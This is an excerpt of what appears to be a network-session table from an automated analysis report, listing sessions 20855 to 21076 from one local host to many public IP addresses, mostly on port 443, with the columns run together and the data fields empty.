                                              20855192.168.2.1452616150.205.8.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20856192.168.2.1437562163.94.128.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20857192.168.2.1443720129.247.7.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20858192.168.2.1441038154.102.4.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20859192.168.2.145114091.196.171.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20860192.168.2.144690074.103.158.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20861192.168.2.1433738222.43.13.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20862192.168.2.1446598124.255.203.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20863192.168.2.1444512217.215.135.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20864192.168.2.145113236.137.1.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20865192.168.2.1449144154.57.87.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20866192.168.2.144393688.246.151.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20867192.168.2.144631849.204.69.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20868192.168.2.1448970146.90.226.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20869192.168.2.1449180110.102.160.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20870192.168.2.1435706133.135.186.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20871192.168.2.1439776217.164.107.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20872192.168.2.144270688.15.142.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20873192.168.2.1439544132.50.208.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20874192.168.2.145848043.212.169.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20875192.168.2.1444088207.205.123.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20876192.168.2.143928076.23.149.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20877192.168.2.1435582141.161.166.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20878192.168.2.1459772123.155.28.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20879192.168.2.143493234.34.133.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20880192.168.2.1453396103.29.196.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20881192.168.2.144392225.181.84.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20882192.168.2.1437658185.14.118.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20883192.168.2.1434988208.162.244.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20884192.168.2.1436092150.193.52.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20885192.168.2.144496868.130.47.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20886192.168.2.1443148146.243.79.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20887192.168.2.1456822113.117.148.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20888192.168.2.144998248.91.91.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20889192.168.2.1436722152.175.97.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20890192.168.2.1437348161.210.231.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20891192.168.2.144620282.178.21.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20892192.168.2.1434226108.160.168.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20893192.168.2.1434564170.29.166.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20894192.168.2.14338644.59.253.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20895192.168.2.144546292.171.199.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20896192.168.2.1437674187.195.183.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20897192.168.2.1457402201.252.67.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20898192.168.2.144514475.32.15.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20899192.168.2.1440494182.58.133.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20900192.168.2.144990845.218.239.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20901192.168.2.1448284121.1.26.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20902192.168.2.1437706134.68.55.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20903192.168.2.1437652103.180.112.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20904192.168.2.145381212.99.34.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20905192.168.2.1456544169.136.0.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20906192.168.2.145887891.224.244.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20907192.168.2.1455836148.156.61.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20908192.168.2.1458748108.212.210.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20909192.168.2.14547301.10.155.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20910192.168.2.1438750209.148.82.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20911192.168.2.145294686.21.89.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20912192.168.2.1435532182.170.73.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20913192.168.2.1449618103.37.143.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20914192.168.2.143377254.11.229.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20915192.168.2.1441052115.93.34.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20916192.168.2.143608834.44.68.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20917192.168.2.1441466109.159.94.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20918192.168.2.145780294.110.74.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20919192.168.2.144417885.18.89.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20920192.168.2.1439680113.159.206.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20921192.168.2.144662079.182.158.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20922192.168.2.1433878188.32.0.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20923192.168.2.1443556180.68.111.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20924192.168.2.145284487.219.1.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20925192.168.2.145514042.190.209.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20926192.168.2.143802448.72.86.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20927192.168.2.1440484102.214.32.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20928192.168.2.145492096.136.45.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20929192.168.2.1442836206.51.16.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20930192.168.2.1447550149.110.63.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20931192.168.2.1438956201.5.229.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20932192.168.2.145041895.254.149.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20933192.168.2.1446300153.200.217.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20934192.168.2.145991699.19.215.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20935192.168.2.1442690106.84.162.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20936192.168.2.14414242.163.61.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20937192.168.2.1434710123.249.232.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20938192.168.2.143574098.90.179.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20939192.168.2.145964050.208.71.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20940192.168.2.144640097.73.112.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20941192.168.2.1440008195.140.215.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20942192.168.2.1442156184.66.48.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20943192.168.2.14547588.195.89.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20944192.168.2.145392825.28.242.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20945192.168.2.145371220.165.124.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20946192.168.2.1442786138.39.111.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20947192.168.2.144655272.111.233.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20948192.168.2.145257432.5.127.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20949192.168.2.1453188104.56.114.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20950192.168.2.145734083.179.181.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20951192.168.2.143691245.234.14.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20952192.168.2.1442940124.175.181.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20953192.168.2.1447120201.149.22.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20954192.168.2.1449338109.126.196.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20955192.168.2.1458426193.179.184.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20956192.168.2.144991282.149.213.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20957192.168.2.1447866135.86.16.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20958192.168.2.1436450205.33.87.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20959192.168.2.1460398172.103.231.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20960192.168.2.1451458177.205.119.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20961192.168.2.1447572132.163.188.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20962192.168.2.144043685.53.143.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20963192.168.2.1436242167.191.218.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20964192.168.2.145422867.100.141.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20965192.168.2.1442952179.45.221.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20966192.168.2.146005034.221.91.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20967192.168.2.1460664117.4.35.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20968192.168.2.1438494162.92.209.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20969192.168.2.1452704107.45.50.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20970192.168.2.1440242222.181.186.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20971192.168.2.1459750182.197.116.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20972192.168.2.1441192195.58.69.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20973192.168.2.1449004209.17.143.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20974192.168.2.143671898.21.40.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20975192.168.2.144404240.151.109.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20976192.168.2.1439574167.71.15.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20977192.168.2.1457582152.48.123.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20978192.168.2.1441134144.227.105.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20979192.168.2.1455842159.247.43.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20980192.168.2.1450572180.45.157.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20981192.168.2.1436458140.70.144.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20982192.168.2.1441942151.76.138.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20983192.168.2.145464619.32.213.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20984192.168.2.1443814205.52.227.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20985192.168.2.1452210170.67.32.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20986192.168.2.145549836.149.178.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20987192.168.2.1435632164.179.93.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20988192.168.2.1438770168.183.251.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20989192.168.2.1435618182.147.4.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20990192.168.2.1456182152.81.181.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20991192.168.2.1456410185.242.237.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20992192.168.2.1448270153.11.63.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20993192.168.2.1460628148.125.13.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20994192.168.2.1439844216.54.148.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20995192.168.2.1453874162.200.154.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20996192.168.2.1447658178.92.127.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20997192.168.2.1453784147.143.246.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20998192.168.2.1450964206.137.88.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20999192.168.2.1443474108.117.17.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21000192.168.2.145577289.191.157.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21001192.168.2.146017283.194.37.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21002192.168.2.1454482204.150.57.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21003192.168.2.1439022124.131.203.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21004192.168.2.144319648.126.108.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21005192.168.2.1434170152.156.178.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21006192.168.2.144798083.218.90.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21007192.168.2.144699627.254.220.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21008192.168.2.144506024.180.96.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21009192.168.2.1446318197.26.250.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21010192.168.2.145145038.158.226.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21011192.168.2.144906265.118.140.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21012192.168.2.146050224.198.24.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21013192.168.2.1449664179.183.183.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21014192.168.2.1448328184.144.186.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21015192.168.2.144709032.25.229.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21016192.168.2.1442686180.89.93.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21017192.168.2.1440514100.210.182.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21018192.168.2.145429235.89.78.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21019192.168.2.1436054151.51.208.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21020192.168.2.1449860177.3.200.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21021192.168.2.1438408154.139.42.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21022192.168.2.14527729.196.205.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21023192.168.2.1452180122.27.210.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21024192.168.2.1443104187.40.32.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21025192.168.2.144248466.143.202.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21026192.168.2.143741473.234.236.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21027192.168.2.143896431.187.208.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21028192.168.2.144867839.191.116.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21029192.168.2.1456884211.98.80.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21030192.168.2.1449462103.54.41.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21031192.168.2.1435750125.104.125.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21032192.168.2.1454246167.213.88.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21033192.168.2.1449684208.237.15.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21034192.168.2.143547896.9.52.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21035192.168.2.144736088.69.23.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21036192.168.2.1433184122.151.79.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21037192.168.2.1451668217.211.147.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21038192.168.2.146084077.23.110.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21039192.168.2.143566854.170.136.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21040192.168.2.14366861.73.202.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21041192.168.2.1459630157.135.64.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21042192.168.2.1451742107.71.96.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21043192.168.2.145445290.62.50.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21044192.168.2.143860467.119.205.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21045192.168.2.1454680205.12.47.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21046192.168.2.145064693.81.110.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21047192.168.2.1442514200.227.77.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21048192.168.2.1442618187.110.174.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21049192.168.2.1433714106.67.229.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21050192.168.2.1436468178.169.60.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21051192.168.2.143827486.231.109.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21052192.168.2.1443416168.171.145.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21053192.168.2.143346294.121.211.88080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21054192.168.2.1435564118.28.179.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21055192.168.2.1435792181.250.236.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21056192.168.2.145980270.122.228.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21057192.168.2.1443214188.204.217.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21058192.168.2.1451402202.137.176.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21059192.168.2.145525852.109.53.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21060192.168.2.1435940128.135.230.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21061192.168.2.1456322167.6.41.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21062192.168.2.144194825.128.221.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21063192.168.2.1446192190.76.250.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21064192.168.2.1452022155.247.79.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21065192.168.2.1452632121.205.11.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21066192.168.2.144073287.50.28.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21067192.168.2.143497043.19.216.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21068192.168.2.1451090100.28.171.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21069192.168.2.1440700180.184.235.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21070192.168.2.144598098.78.128.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21071192.168.2.1434926196.57.238.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21072192.168.2.1445764191.64.149.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21073192.168.2.1439274137.137.248.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21074192.168.2.145989034.104.151.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21075192.168.2.1441112135.228.63.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21076192.168.2.144444072.36.85.60443
                                              TimestampBytes transferredDirectionData


